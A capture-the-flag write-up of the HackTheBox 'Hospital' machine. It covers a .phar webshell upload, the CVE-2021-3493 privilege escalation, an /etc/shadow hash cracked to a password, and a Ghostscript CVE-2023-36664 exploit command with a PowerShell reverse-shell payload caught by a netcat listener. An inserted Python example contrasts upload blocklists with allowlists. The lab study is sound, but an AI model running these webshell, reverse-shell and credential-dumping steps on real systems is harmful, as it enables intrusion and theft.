Writeup of Hospital From HackTheBox
Published on: Thursday, Dec 19, 2024
For the initial port scan, I use the following nmap command:
nmap -sS -A -Pn -T5 -p- -oN nmap.txt 10.129.229.189
And receive the following results:
I start by checking the service on port 443 and discover an instance of Roundcube webmail. Since there are no recent unauthenticated exploits for Roundcube, I check the other services. On port 8080 I find a simple web app that allows me to create an account and to upload a file. I use the p0wny@shell:~# webshell and try different file extensions. The upload succeeds with a .phar file extension. The uploaded file can be found in the /uploads/ directory.
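Added example (not from the original writeup or the target application): why an extension blocklist lets a .phar upload through while an allowlist with server-chosen file names does not. The blocklist contents, the allowlist, the sample names and the handler pattern (taken to be the stock Debian/Ubuntu mod_php FilesMatch rule) are assumptions.

```python
import os
import re
import secrets

# Assumption: the container uses the stock Debian/Ubuntu mod_php rule, which
# hands every file matching this pattern to PHP, so .phar runs like .php.
PHP_HANDLER = re.compile(r".+\.ph(?:ar|p|tml)$")

BLOCKLIST = {"php", "php5", "phtml"}       # hypothetical weak filter: forgot phar
ALLOWLIST = {"png", "jpg", "jpeg", "gif"}  # hypothetical: all this app needs

# Constructed sample upload names.
SAMPLES = ["shell.phar", "shell.php", "scan.PNG", "x.phar.png", "shell.php."]


def final_ext(filename: str) -> str:
    """Lower-cased last extension of the base name, without the dot."""
    base = os.path.basename(filename.replace("\\", "/")).rstrip(". ")
    return os.path.splitext(base)[1].lstrip(".").lower()


def runs_as_php(stored_name: str) -> bool:
    """Would the assumed handler rule execute this stored file?"""
    return PHP_HANDLER.match(stored_name) is not None


def blocklist_accepts(filename: str) -> bool:
    """Weak check: refuse only extensions somebody thought of."""
    return final_ext(filename) not in BLOCKLIST


def allowlist_store_name(filename: str):
    """Return a server-chosen storage name, or None if the upload is refused."""
    if "\x00" in filename:
        return None
    ext = final_ext(filename)
    if ext not in ALLOWLIST:
        return None
    # Never reuse the client's name: a random name removes attacker control
    # over the path and over inner extensions such as "x.phar.png".
    return f"{secrets.token_hex(16)}.{ext}"


def compare(names=SAMPLES):
    """(name, blocklist accepts, allowlist accepts) for each sample."""
    return [(n, blocklist_accepts(n), allowlist_store_name(n) is not None)
            for n in names]
```

Independently of the filter, the uploads directory should not be served with the PHP handler enabled.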
Pwning the container
Using the shell I find out that I am in an Ubuntu container.
www-data@webserver:…/html/uploads uname -a
Linux webserver 5.19.0-35-generic #36-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 3 18:36:56 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
I try to exploit CVE-2021-3493, which tends to work on most Ubuntu systems.
I upload the exploit and run it. It works, but the webshell cannot handle it, so I use the webshell to run a reverse shell and use the exploit from there.
After running the exploit again and getting a root shell, I take a look at /etc/shadow and dump the password hash for drwilliams.
drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::
I then use hashcat to crack the password.
hashcat -m 1800 pw.hash rockyou.txt --show
$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:qwe123!@#
User flag
Using the credentials drwilliams:qwe123!@# I log into Roundcube webmail.
I find a mail telling me to send a GhostScript file. So I look for recent GhostScript RCEs and find CVE-2023-36664.
I use RevShells to generate a Base64 encoded PowerShell reverse shell and add the code as the payload for the exploit generator.
python3 CVE_2023_36664_exploit.py -g -x eps -p "powershell -e <base64-encoded payload>"
I send the generated .eps file to Dr. Brown and wait for the reverse shell to connect back to my listener.
$ nc -lnvp 1234
Listening on 0.0.0.0 1234
Connection received on 10.129.229.189 6230
PS C:\Users\drbrown.HOSPITAL\Documents>
I can now use the reverse shell to navigate to the Desktop folder and obtain the user flag.
Administrator flag
I start by running winpeas and see that I have write access to C:\xampp, so I check the folder and find out that this is where Roundcube is being hosted.
I put the p0wny@shell:~# webshell from earlier in the htdocs folder (this time as a .php file) and access it via the browser.
Now I can use the shell to obtain the root flag from the Administrator's desktop.